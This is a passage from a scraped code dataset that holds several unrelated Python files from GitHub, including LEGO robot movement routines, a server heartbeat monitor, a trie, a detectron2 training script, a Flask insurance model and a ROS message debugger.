accelerate(start_power, final_power, delay, distance, speed_increment, stop: bool, correct: bool): # Function to accelerate/decelerate from x vel to y vel at z mm/s^2\n resetAngles() # Resetting the angles\n current_power = start_power # Assigning the current power to the start power given as a parameter.\n if speed_increment == 0: # If no speed increment is given or speed increment is 0\n speed_increment = abs(final_power - start_power) / distance * 8 # Assigning the speed increment to be the different of powers divided by the distance.\n resetAngles() # reset angle rotations\n # get desired direction\n try:\n direction_coefficient = final_power / abs(final_power)\n except ZeroDivisionError:\n direction_coefficient = start_power / abs(start_power)\n # while power is less than final power\n while (abs(current_power) < abs(final_power) if abs(current_power) <= abs(final_power) else abs(current_power) > abs(final_power)):\n # move in desired direction at increasing power\n robot.drive(current_power, 0)\n # increment speed\n if ((abs(start_power) <= abs(final_power)) or (abs(start_power) > abs(final_power) and abs(current_power) > 20)):\n print(\"speed increment:\", str(speed_increment), \"increase:\", speed_increment * direction_coefficient * (1 if abs(current_power) <= abs(final_power) else -1))\n current_power += (speed_increment * direction_coefficient * (1 if abs(current_power) <= abs(final_power) else -1))\n # display current movement stats\n print(\"moving, power\", str(current_power), \"left rotations\", str(left_motor.angle()), \"right rotations\", str(right_motor.angle()), \"left distance\", str(angleToDistance(left_motor.angle())), \"right distance\", str(angleToDistance(right_motor.angle())), \"continue?\", (angleToDistance(abs(left_motor.angle())) < distance))\n # wait for specified delay before changing power again\n wait(delay)\n # if desired distance reached, stop increasing power\n if ((abs(angleToDistance(left_motor.angle())) >= distance) or (angleToDistance(abs(right_motor.angle())) >= distance)):\n break\n # keep moving until desired distance reached\n while not ((angleToDistance(abs(left_motor.angle())) >= distance) or (angleToDistance(abs(right_motor.angle())) >= distance)):\n wait(delay)\n # if braking desired\n if stop:\n # brake\n robot.stop(Stop.HOLD)\n # if angle correction required\n if correct:\n # correct angle (making robot face correct direction)\n correctRotation(distance)\n\ndef move(steering, speed, amount): # A function to move the robot when steering, speed and amount is given.\n # speed is in mm/s and steering is in degrees/s so time can be calculated\n # reset motor rotations\n resetAngles()\n # if not turning on spot\n if speed != 0:\n # set time to move until desired distance is reached, where amount is a distance in mm\n time = abs(amount / speed * 1000)\n # if turning on spot\n else:\n # set time to move until desired angle is reached, where amount is a distance in degrees\n time = abs(amount / steering * 1000)\n # move for specified time to reach target distance/angle\n robot.drive_time(speed, steering, time)\n # display movement stats\n print(\"moved, left\", left_motor.angle(), \"right\", right_motor.angle())\n\ndef correctRotation(distance): # Function to make sure there is straight movement.\n # The function realligns the robot depending on the rotations the two motors have completed.\n # work out how many degrees need to be moved on each motor\n left_motor_degrees_remaining = abs(left_motor.angle()) - distanceToAngle(distance)\n right_motor_degrees_remaining = abs(right_motor.angle()) - distanceToAngle(distance)\n print(\"left motor degrees remaining:\", str(left_motor_degrees_remaining)) # Displaying the degrees remaining to the console.\n print(\"right motor degrees remaining:\", str(right_motor_degrees_remaining))\n # if motor needs to move\n if (left_motor_degrees_remaining != 0):\n # reset motor rotations\n left_motor.reset_angle(0)\n # move motor required number of degrees\n left_motor.run_angle(5, left_motor_degrees_remaining, Stop.HOLD)\n # if motor needs to move\n if (right_motor_degrees_remaining != 0):\n # reset motor rotations\n right_motor.reset_angle(0)\n # move motor required number of degrees\n right_motor.run_angle(5, right_motor_degrees_remaining, Stop.HOLD)\n\ndef lineFollow(forward: bool, threshold, caller: int): # Function to make the robot follow any line with the robot's two downfacing sensors.\n # Assinging variables that are used in the code below.\n # Soft-coding variables makes it easier to change in the future\n speed = 50 if forward else -50 # Speed at which the robot travels.\n error = 0\n last_error = 0\n integral = 0\n derivative = 0\n kp = 0.6\n ki = 0.02\n\n kd = 0.001\n perfect_steering = 0\n resetAngles()\n \n # run until break\n while True:\n error = left_colour_sensor.reflection() - right_colour_sensor.reflection() # Getting the difference in reflection of the two colour sensors.\n # work out total error\n integral += error\n # predict next error\n derivative = error - last_error\n # work out amount to steer\n steering = error * kp + integral * ki + derivative * kd\n # if turning value is below threshold, increase count of number of times this has happened\n if (threshold != 0 and -2 < steering < 2 and caller != 9):\n perfect_steering += 1\n # if maximum required number of times required reached, stop line following\n if (threshold <= perfect_steering):\n break\n else:\n # move robot\n robot.drive(speed, steering)\n # if called from mission 9 (beams), robot has moved 600 degrees of motor rotation and steering value is above threshold\n if (caller == 9 and left_motor.angle() > 600 and steering >= threshold):\n # print steering stats\n print(\"POSITION 1, steering\", steering)\n # reset motor rotations\n resetAngles()\n # stop line following\n break\n # store last error\n last_error = error\n # brake\n robot.stop(Stop.HOLD)\n # return final steering value\n return steering\n\n# Assinging the modules of the Robot. \n# Two Large Motors.\nleft_motor = Motor(Port.A, Direction.COUNTERCLOCKWISE) # Ports and direction of motion are given as parameters.\nright_motor = Motor(Port.D, Direction.COUNTERCLOCKWISE)\n# The Robot DriveBase\nrobot = DriveBase(left_motor, right_motor, 62.4, 96.5) # The two motors and ... are given as parameters. \n# The two downward facing colour sensors.\nleft_colour_sensor = ColorSensor(Port.S1) # Ports of the sensors are given as a parameter.\nright_colour_sensor = ColorSensor(Port.S2)\n","repo_name":"rs-blackthunder/fll","sub_path":"2019-20/Nationals/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"30664374590","text":"import asyncio\nimport json\nimport logging\nimport sys\nfrom datetime import datetime, timedelta\nfrom inspect import signature\nimport requests\nimport urllib3\nimport yaml\nfrom sqlalchemy import Column, DateTime, Integer, MetaData, String, Table, create_engine\nfrom sqlalchemy.sql.sqltypes import Boolean\n\nurllib3.disable_warnings() # disabling warings about lacking of HTTPS\n\n# Load config file\nwith open(\"example_config.yml\", mode=\"r\") as file:\n config = yaml.full_load(file)\n\n# Logining configuration\nlogging.basicConfig(\n filename=config[\"logs\"][\"filename\"],\n filemode=config[\"logs\"][\"filemode\"],\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S\",\n)\n\n##RocketChat WeebHook and headers##\nurl = config[\"credentials\"][\"ROCKETCHAT\"][\"webhook\"]\nheaders: dict = config[\"credentials\"][\"ROCKETCHAT\"][\"headers\"]\n\n\n# SQL engine and table maping\nengine = create_engine(\n config[\"credentials\"][\"DB\"][\"engine\"]\n + \"://\"\n + config[\"credentials\"][\"DB\"][\"username\"]\n + \":\"\n + config[\"credentials\"][\"DB\"][\"password\"]\n + \"@\"\n + config[\"credentials\"][\"DB\"][\"adress\"]\n + \"/\"\n + config[\"credentials\"][\"DB\"][\"db\"]\n)\nmetadata = MetaData()\n\nhearthbeat = Table(\n config[\"credentials\"][\"DB\"][\"table\"],\n metadata,\n Column(\"server\", String(10)),\n Column(\"date_time\", DateTime),\n Column(\"time_diff\", String(30)),\n Column(\"seconds_diff\", Integer),\n)\n\n\nclass OvRunCheck(object):\n def __init__(\n self,\n name: str,\n adress: str,\n format: str = \"%Y-%m-%d %H:%M:%S\",\n last_run: str = \"1920-01-01T00:00:00.000+02:00\",\n db_save: bool = True,\n notification: bool = True,\n msg_interval: int = 5,\n notification_treshold: int = 15,\n ) -> None:\n \"\"\"\n Timer class used to check content of remote adress\n\n :param name(str): name of server\n :param adress(str): HTTP/HTTPS adress used in GET request\n :param format(str): Default: 'YYYY-MM-DD HH:MM:SS' Format used in .strftime to diplay current time in human form.\n :param last_run(str): Default: '1920-01-01 00:00:00' DateTime from which diff will be calulated.\n :param db_save(bool): Define if changes in computed time should be looged to DB. (Default: True)\n :param notification(bool): Define if notification should be send via RocketChat. (Default: True)\n :param msg_interval(int): Specify how often notification should be send via RocketChat. (Default: 5min)\n :param notification_treshold(int): Specify time period after which first notfication will be send (Default: 15min).\n \"\"\"\n self.name = name\n self.adress = adress\n self.format = format\n self.last_run = datetime.fromisoformat(last_run)\n self.db_save = db_save\n self.notification = notification\n self.msg_interval = msg_interval\n self.notification_treshold = notification_treshold\n self.inc = notification_treshold\n\n def __str__(self) -> str:\n fields = signature(self.__init__).parameters\n values = \", \".join(str(getattr(self, f)) for f in fields)\n return f\"\"\"{self.name}({values})\"\"\"\n\n def __repr__(self) -> str:\n return str(self.__dict__)\n\n @property\n def current_time(self):\n try:\n # Ignoring SSL as we do not send reacive anything sensitive\n response = requests.get(self.adress, verify=False).json()\n except requests.exceptions.RequestException:\n logging.error(f\"{self.name} - SSLError {sys.exc_info()[0]}\")\n response = None\n\n if response:\n current_time = datetime.fromisoformat(\n response[\"data_version\"][\"computed_refresh_date\"]\n )\n else:\n current_time = datetime.fromisoformat(\"9999-12-12T00:00:00.000+00:00\")\n return current_time\n\n @property\n def now(self):\n try:\n # Ignoring SSL as we do not send reacive anything sensitive\n response = requests.get(self.adress, verify=False).json()\n except requests.exceptions.RequestException:\n logging.error(f\"{self.name} - SSLError {sys.exc_info()[0]}\")\n response = None\n\n if response:\n now = datetime.fromisoformat(response[\"data_version\"][\"now\"])\n else:\n now = datetime.fromisoformat(\"8999-12-12T00:00:00.000+00:00\")\n return now\n\n def show_time(self) -> str:\n string_time = self.current_time.strftime(self.format)\n print(string_time)\n\n def time_diff(self):\n if self.last_run < self.current_time:\n try:\n diff = self.current_time - self.last_run\n if self.db_save == True:\n ins = hearthbeat.insert().values(\n server=self.name,\n date_time=self.now,\n time_diff=str(diff),\n seconds_diff=diff.total_seconds(),\n )\n try:\n conn = engine.connect()\n insert = conn.execute(ins)\n insert.close()\n except:\n errmsg = f\"{self.name} - Error during save to Database {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n msg = f\"{self.name} - OV run detected, previous run lasted {str(diff)}\"\n logging.info(msg)\n print(msg)\n self.last_run = self.current_time\n self.inc = self.msg_interval\n except:\n errmsg = f\"{self.name} - Unknow error {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n # Exeption need to be replace with more specific, currently don't know what can happen here\n else:\n # This should be split into smaller method/fuction with more specific exeptions.\n # I know it work but it is horrible\n diff = self.now - self.last_run\n if (\n diff > timedelta(minutes=self.notification_treshold)\n and self.notification == True\n and self.inc % self.msg_interval == 0\n ):\n try:\n requests.post(\n url,\n data=json.dumps(\n {\n \"text\": f\"**{self.name}** - Ostatni przebieg OV {str(diff)} temu\"\n }\n ),\n headers=headers,\n )\n except:\n errmsg = f\"{self.name} - Error during sending notification {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n msg = f\"{self.name} - No run occured, waiting 60s\"\n logging.info(msg)\n print(msg)\n self.inc += 1\n\n\nserverlist: list = []\n\nprint(\"Application starting\")\nfor key in config[\"servers\"]:\n serverlist.append(\n OvRunCheck(\n name=config[\"servers\"][key][\"name\"],\n adress=config[\"servers\"][key][\"adress\"],\n db_save=config[\"servers\"][key][\"db_save\"],\n notification=config[\"servers\"][key][\"notification\"],\n msg_interval=config[\"servers\"][key][\"msg_interval\"],\n notification_treshold=config[\"servers\"][key][\"notification_treshold\"],\n )\n )\nprint(\"Loaded objects:\")\nfor server in serverlist:\n print(server)\n\nloop = asyncio.get_event_loop()\n\n\nasync def while_loop():\n while True:\n start = datetime.now()\n for server in serverlist:\n server.time_diff()\n end = datetime.now()\n elaps = end - start\n await asyncio.sleep(config[\"main\"][\"checkup_interval\"] - elaps.total_seconds())\n\n\nloop.create_task(while_loop())\nloop.run_forever()\n","repo_name":"Niviral/ServerStatusCheck","sub_path":"log_time.py","file_name":"log_time.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11954082207","text":"from rules import *\n\ndef EnumerateFromStandardForm(rules, n, v):\n t = {}\n for k in range(n+1):\n for r in rules:\n t = evaluateRule(r, rules, k, t, v)\n return t\n\ndef evaluateRule(r, rules, k, table, vals):\n # initialize\n if k not in table:\n table[k] = {}\n\n rule = rules[r]\n\n if isinstance(rule, Set) or (isinstance(rule, KSet) and rule.Rel == \"<=\"):\n if k == 0: table[k][r] = 1.0\n return table\n\n if isinstance(rule, Cycle) or isinstance(rule, KCycle):\n return table\n\n # evaluate coefficient\n table[k][r] = evaluate(r, rules, k, table, vals, [r], [k])\n\n if isinstance(r, Theta) and r.SubRule not in table[k]:\n table[k][r.SubRule] = float(table[k][r]) / k if k > 0 else 0.0\n\n return table\n\n# recursively evaluate a coefficient\ndef evaluate(r, rules, k, table, vals, r0, k0):\n def subEval(r1, k1):\n return 0.0 if r1 in r0 and k1 in k0 else evaluate(r1, rules, k1, table, vals, r0 + [r1], k0 + [k1])\n # base case\n if r in table[k]:\n return table[k][r]\n # 0 if k < valuation\n if isinstance(r, Theta) and k < vals[r.SubRule]:\n return 0.0\n elif not isinstance(r, Theta) and k < vals[r]:\n return 0.0\n # begin recursive evaluation\n rule = rules[r]\n # A = Z\n if isinstance(rule, Atom):\n return 1.0 if rule.Size == k else 0.0\n # A = B + C\n elif isinstance(rule, Union):\n return subEval(rule.SubRule1, k) + subEval(rule.SubRule2, k)\n # A = B * C\n elif isinstance(rule, Product):\n conv = 0.0\n for i in range(0,k+1):\n a, b = subEval(rule.SubRule1, i), subEval(rule.SubRule2, k-i)\n conv += a * b if a != 0.0 and b != 0.0 else 0.0\n return conv\n elif isinstance(rule, Set) or (isinstance(rule, KSet) and rule.Rel == \"<=\"):\n return 1.0\n elif isinstance(rule, Cycle) or isinstance(rule, KCycle):\n return subEval(Theta(r), k) / k if k > 0 else 0.0\n elif isinstance(rule, KSet) and rule.Rel != \"<=\":\n return subEval(Theta(r), k) / k if k > 0 else 0.0\n elif isinstance(rule, Theta):\n return k * subEval(rule.SubRule, k)\n elif isinstance(rule, Delta):\n dlt = 0.0\n for i in range(1, k+1):\n dlt += rule.Function(i) * subEval(rule.SubRule, k/i) if k % i == 0 else 0.0\n return dlt\n else: raise Exception(\"Unsupported rule \" + str(rule))","repo_name":"spritt/enumeration-of-combinatorial-structures","sub_path":"core/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35878485024","text":"\nclass Node:\n def __init__(self, c=''):\n self.c = c\n self.children = {}\n self.end = False\n \n def insert(self, word):\n cur = self\n for letter in word:\n if letter not in cur.children:\n cur.children[letter] = Node(letter)\n cur = cur.children[letter]\n \n def search(self, word):\n cur = self\n for i, letter in enumerate(word):\n if letter is '.':\n for child in cur.children.values():\n if child.search(word[i+1:]):\n return True\n return False\n elif letter in cur.children:\n cur = cur.children[letter]\n else:\n return False\n return True\n\n\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = Node()\n\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n self.root.insert(word)\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n \"\"\"\n return self.root.search(word)\n\n\nif __name__ == '__main__':\n w = WordDictionary()\n\n w.addWord('a')\n w.addWord('a')\n print(w.search('.'))\n print(w.search('a'))\n print(w.search('aa'))\n print(w.search('a'))\n print(w.search('a.'))\n print(w.search('.a'))","repo_name":"lukegao/leetcode-practices","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28582831112","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport six\nfrom copy import deepcopy\n\nfrom .base import BaseDataset\nfrom .fields import Field\n\n\nclass NoObjectsException(Exception):\n pass\n\n\nclass DatasetOptions(object):\n def __init__(self, options=None):\n self.model = getattr(options, 'model', None)\n self.queryset = getattr(options, 'queryset', None)\n self.fields = getattr(options, 'fields', [])\n self.exclude = getattr(options, 'exclude', [])\n\n\nclass DatasetMetaclass(type):\n def __new__(cls, name, bases, attrs):\n attrs['base_fields'] = {}\n declared_fields = {}\n\n try:\n parents = [b for b in bases if issubclass(b, ModelDataset)]\n parents.reverse()\n\n for p in parents:\n parent_fields = getattr(p, 'base_fields', {})\n\n for field_name, field_object in parent_fields.items():\n attrs['base_fields'][field_name] = deepcopy(field_object)\n except NameError:\n pass\n\n for field_name, obj in attrs.copy().items():\n if issubclass(type(obj), Field):\n field = attrs.pop(field_name)\n declared_fields[field_name] = field\n\n attrs['base_fields'].update(declared_fields)\n attrs['declared_fields'] = declared_fields\n\n new_class = super(DatasetMetaclass, cls).__new__(cls, name,\n bases, attrs)\n opts = new_class._meta = DatasetOptions(getattr(new_class,\n 'Meta', None))\n\n if new_class.__name__ == 'ModelDataset':\n return new_class\n\n if not opts.model and not opts.queryset:\n raise NoObjectsException(\"You must set a model or non-empty \"\n \"queryset for each Dataset subclass\")\n if opts.queryset is not None:\n queryset = opts.queryset\n model = queryset.model\n new_class.queryset = queryset\n new_class.model = model\n else:\n model = opts.model\n queryset = model.objects.all()\n new_class.model = model\n new_class.queryset = queryset\n\n return new_class\n\n\nclass ModelDataset(six.with_metaclass(DatasetMetaclass, BaseDataset)):\n\n def __init__(self, *args, **kwargs):\n included = [field.name for field in self.model._meta.fields]\n if self._meta.fields:\n included = filter(lambda x: x in self._meta.fields, included)\n if self._meta.exclude:\n included = filter(lambda x: x not in self._meta.exclude, included)\n\n self.fields = dict((field, Field()) for field in included)\n\n self.fields.update(deepcopy(self.base_fields))\n\n self.header_dict = dict(\n (field.header or name, field.attribute or name)\n for name, field in self.fields.items())\n\n self.header_list = self.header_dict.keys()\n self.attr_list = [self.header_dict[h] for h in self.header_list]\n super(ModelDataset, self).__init__(*args, **kwargs)\n","repo_name":"joshourisman/django-tablib","sub_path":"django_tablib/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"77"} +{"seq_id":"71223091130","text":"n = int(input())\nk = int(input())\n\nboard = [[0]*n for _ in range(n)]\nfor _ in range(k):\n x, y = map(int, input().split())\n board[x][y] = 1 #해당 위치에 사과가 위치\nfor case in board:\n print(case)\n\nl = int(input())\ndummy = []\nfor _ in range(l):\n ls = input().split()\n x = int(ls[0]) #x초 뒤에\n c = ls[1] # 방향 l, d\n dummy.append((x, c))\n#dummy = [(3, D), (15, L), (17, D)]\n\nsnake = [(0, 0)]\nend = False\nsave = 0\nfor minute in range(1, 60): #뱀은 매 초마다 이동\n\n for i in range(len(dummy)):\n \n if dummy[i][0] == minute:\n \n # D 오른쪽으로 이동\n if dummy[i][1] == 'D':\n #먼저 뱀은 몸길이를 늘려 머리를 다음칸에 위치시킨다.\n snake.append( (snake[-1][0]+1, snake[-1][1]) )\n if board[snake[-1][0]+1][snake[-1][1]] == 1: #이동한 칸에 사과가 있다면\n board[snake[-1][0]+1][snake[-1][1]] = 0\n #뱀이 이리저리 기어다니다가 벽 또는 자기자신의 몸과 부딪히면 게임이 끝난다.\n if snake[-1] in dummy:\n end = True\n save = minute\n break\n if not (0<= snake[-1][0] newInterval[0]:\n break\n res.append(intervals[i])\n \n \n # BASE case wherre we need to add newinterval at starts\n # check If we need to merge with new interval or not \n if len(res) == 0:\n res.append(newInterval)\n else:\n # check if newInterval needs to be overlapped with previous one or not\n if(newInterval[0] <= res[-1][1]):\n res[-1][1] = max(newInterval[1], res[-1][1])\n else:\n res.append(newInterval)\n \n # now merge with other intervals\n for i in range(index, len(intervals)):\n st = intervals[i][0]\n en = intervals[i][1]\n # // overlapping\n if st <= res[-1][1]:\n res[-1][1] = max(en, res[-1][1])\n else:\n res.append(intervals[i])\n \n return res\n \n \n","repo_name":"cr21/PythonLeetcode","sub_path":"Intervals/LC57_insert_interval.py","file_name":"LC57_insert_interval.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39056956743","text":"def cocn_list(l1,l2):\n output = []\n for i in l1:\n for j in l2:\n output.append(f\"{i} {j}\")\n return output\n\nif __name__ == \"__main__\":\n list1 = [\"Hello \", \"take \"]\n list2 = [\"Dear\", \"Sir\"] \n\n print(cocn_list(list1,list2))","repo_name":"apatil241995/Python-practice-problems-Week-7","sub_path":"31-03-2022/49 concat lists/using function.py","file_name":"using function.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7456302684","text":"\nfrom google.cloud import storage\n\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\nfrom detectron2 import model_zoo\nfrom detectron2.config import get_cfg\n\nfrom detectron2.engine import DefaultTrainer\n\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nimport os\n\nfrom pycocotools.coco import COCO\nfrom detectron2.data.datasets import register_coco_instances\n\n\ndef download_file(bucket_name = 'foodygs',\n blob_name = 'Nutrition/nutrition.csv',\n download_to_disk = False,\n destination_file_name = '../raw_data/data.csv'):\n\n \"\"\"Download a file from Google Cloud Storage.\n If download_to_disk = False then it will save to memory.\n If download_to_disk = True then it will save to your local disk.\n \"\"\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n blob = bucket.blob(blob_name)\n\n if download_to_disk == True:\n\n blob.download_to_filename(destination_file_name)\n print(\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n blob_name, bucket_name, destination_file_name\n )\n )\n contents = ''\n\n if download_to_disk == False:\n print(f\"retrieving {blob_name} from gcloud\")\n contents = blob.download_as_string()\n print(f\"received... test\")\n return contents\n\nprint(\"Files downloaded\")\n\n\ndef blob_coco_register():\n print('----- blob coco register -----')\n storage_client = storage.Client()\n bucket = storage_client.bucket('foodygs')\n print('-- storage and bucket has been defined')\n\n str_folder_name_on_gcs = 'foodyai_data/Training_2/images/'\n blob_train_annotations = bucket.blob('foodyai_data/Training_2/annotations.json')\n blobs = bucket.list_blobs(delimiter='/',prefix=str_folder_name_on_gcs)\n print('-- training annotations and images blobs has been created')\n\n blob_val_annotations = bucket.blob('foodyai_data/Validation_2/annotations.json')\n blobs_val = bucket.list_blobs(delimiter='/',prefix='foodyai_data/Validation_2/images/')\n print('-- validation annotations and images blobs has been created')\n\n print('-- loading the datasets in coco format and registering them as instances')\n train_annotations_path = blob_train_annotations.download_as_string()\n val_annotations_path = blob_val_annotations.download_as_string()\n print('-- annotation downloaded as string')\n\n train_coco = COCO(train_annotations_path)\n print('-- made annotation coco format')\n\n print('-- register coco instances training dataset begin')\n register_coco_instances(\"training_dataset\", {},train_annotations_path, blobs)\n\n print('-- register coco instances validation dataset begin')\n\n register_coco_instances(\"validation_dataset\", {},val_annotations_path, blobs_val)\n print('-- register coco instances end ')\n\n\n\ndef custom_config(training_dataset = (\"training_dataset\",),\n num_workers = 2,\n trained_model = \"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\",\n num_classes = 323,\n batch_size = 128,\n ims_per_batch = 10,\n learning_rate = 0.00025,\n max_iter = 20,\n output_dir = \"logs/\"):\n\n \"\"\"Initialize pre-trained model\"\"\"\n\n cfg = get_cfg()\n cfg.DATALOADER.NUM_WORKERS = num_workers\n\n # Get configuration from model_zoo. Check the model zoo and use any of the models\n cfg.merge_from_file(model_zoo.get_config_file(trained_model))\n\n # Loading pre trained weights # Let training initialize from model zoo\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(trained_model)\n\n # Model\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = num_classes\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = batch_size\n\n # Solver\n cfg.SOLVER.IMS_PER_BATCH = ims_per_batch\n cfg.SOLVER.BASE_LR = learning_rate\n cfg.SOLVER.MAX_ITER = max_iter\n\n #Datasets\n cfg.DATASETS.TRAIN = training_dataset\n cfg.DATASETS.TEST = ()\n\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n cfg.OUTPUT_DIR = output_dir\n\n trainer = DefaultTrainer(cfg)\n trainer.resume_or_load(resume=False)\n\n trainer.train()\n\n return cfg, trainer\n\n\n\ndef evaluate_model(validation_dataset = \"validation_dataset\",\n model_path = \"model_final.pth\",\n thresh_test = 0.5):\n\n \"\"\"Evaluate model with COCOEvaluater\"\"\"\n\n cfg, trainer = custom_config()\n\n cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_path)\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh_test\n\n evaluator = COCOEvaluator(validation_dataset, output_dir=\"./output\")\n val_loader = build_detection_test_loader(cfg, validation_dataset)\n valResults = inference_on_dataset(trainer.model, val_loader, evaluator)\n\n return valResults, cfg, trainer\n\nif __name__ == '__main__':\n download_file()\n blob_coco_register()\n custom_config()\n #evaluate_model()\n","repo_name":"alidxmt/conv","sub_path":"foodyai/ml_logic/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32465052519","text":"\"\"\"Insurance Model.\"\"\"\n\nfrom __future__ import annotations\nfrom typing import List, Optional\n\nfrom marshmallow import Schema, fields\nfrom marshmallow.validate import Length, OneOf, Range\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom application import db\n\n\nclass QuestionnaireSchema(Schema):\n \"\"\"Schema for validation of Questionnaire fields.\"\"\"\n\n first_name = fields.Str(required=True, validate=Length(min=3, max=20))\n address = fields.Str(required=True, validate=Length(min=5, max=50))\n children = fields.Int(required=False, default=0, validate=Range(min=0))\n occupation = fields.Str(\n required=True, validate=OneOf(choices=['employed', 'self-employed', 'student'])\n )\n email = fields.Email(required=True)\n\n\nclass InsuranceSchema(Schema):\n \"\"\"Schema for validation of Insurance fields.\"\"\"\n\n name = fields.Str(required=True, validate=Length(min=3, max=50))\n monthly_price = fields.Float(required=True, validate=Range(min=0.0))\n\n\nclass InsuranceListSchema(Schema):\n \"\"\"Schema for validation of a list of Insurance fields.\"\"\"\n\n insurances = fields.List(\n fields.Nested(InsuranceSchema(only=('name', 'monthly_price')))\n )\n\n\nclass Insurance(db.Model): # type: ignore\n \"\"\"Insurance database model.\"\"\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n monthly_price = db.Column(db.Float, nullable=False)\n\n def __init__(self, name: str, monthly_price: float):\n \"\"\"Initialize Insurance object.\n\n :param name: Type of insurance (name)\n :param monthly_price: Monthly price of the insurance\n \"\"\"\n self.name = name\n self.monthly_price = monthly_price\n\n def create(self) -> Insurance:\n \"\"\"Create insurance and save to database.\n\n :return: Insurance object\n \"\"\"\n db.session.add(self)\n db.session.commit()\n return self\n\n @staticmethod\n def find_insurance(name: str) -> Optional[Insurance]:\n \"\"\"Search insurance by name.\n\n :param name: Insurance name\n :return: Insurance model or None\n \"\"\"\n try:\n insurance = Insurance.query.filter_by(name=name).one()\n except NoResultFound:\n insurance = None\n\n return insurance # type: ignore\n\n @staticmethod\n def get_recommendation(occupation: str, children: int) -> List[Insurance]:\n \"\"\"Search for specific insurance for different customer realities.\n\n :param occupation: Occupation of the customer\n :param children: Number of children the customer has\n :return: List of recommended insurances for this customer\n \"\"\"\n recommendation = []\n if occupation.lower() == 'employed':\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Private')).first()\n )\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Household')).first()\n )\n elif occupation.lower() == 'student':\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Expat')).first()\n )\n else:\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Public')).first()\n )\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Legal')).first()\n )\n\n if children:\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Life')).first()\n )\n\n return recommendation\n","repo_name":"msvolenski/insurance_api","sub_path":"application/models/insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9691066026","text":"import sys, os, time\nfrom datetime import datetime\nfrom subprocess import Popen\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QInputDialog, QFileDialog\nfrom PySide6.QtCore import QFile\nfrom ui_main import Ui_eTeamDebugger\nimport rvizconfigurer\nimport rospy\nfrom sensor_msgs.msg import PointCloud2, LaserScan, Image\nfrom tf2_msgs.msg import TFMessage\nimport pickle\n\ntfs = {} # last TF for each node\nmsg_storage = {} # last msg for every topic {topic->msg}\nmsg_listener = {} # listeners {topic->listener}\nsnaps = {} # snapshots saved {timestamp -> {topics, timestamp, msgs}}\nrospy.init_node(\"eTeamDebugger\")\n\nclass Listener():\n topic_name = None\n topic_type = None\n subscriber = None\n\n def setup(self,topic_name, topic_type):\n # setting listener vars and starting it\n self.topic_name = topic_name\n self.topic_type = topic_type\n self.subscriber = self.listen()\n\n def callback(self,data):\n if (self.topic_name == \"/tf\"):\n # if topic is /tf i will store it in the custom dict\n child = data.transforms[0].child_frame_id\n tfs[child] = data\n else:\n # otherwise in the normal dict\n msg_storage[self.topic_name] = data\n \n def listen(self):\n # start and return ros subscriber\n return rospy.Subscriber(self.topic_name, self.topic_type, self.callback)\n \n def send(self, msg, newname):\n # send out a specific message\n if (self.topic_name == \"/tf\"):\n # if topic name is /tf i will send all the tfs of each children inside global tfs ignoring msg and newname param\n pub = rospy.Publisher(self.topic_name, self.topic_type, latch=False, queue_size=20)\n for tf in tfs.values():\n pub.publish(tf)\n print(\"Sending tf with child: \" + tf.transforms[0].child_frame_id)\n else:\n # otherwise i will publish the single message passed\n 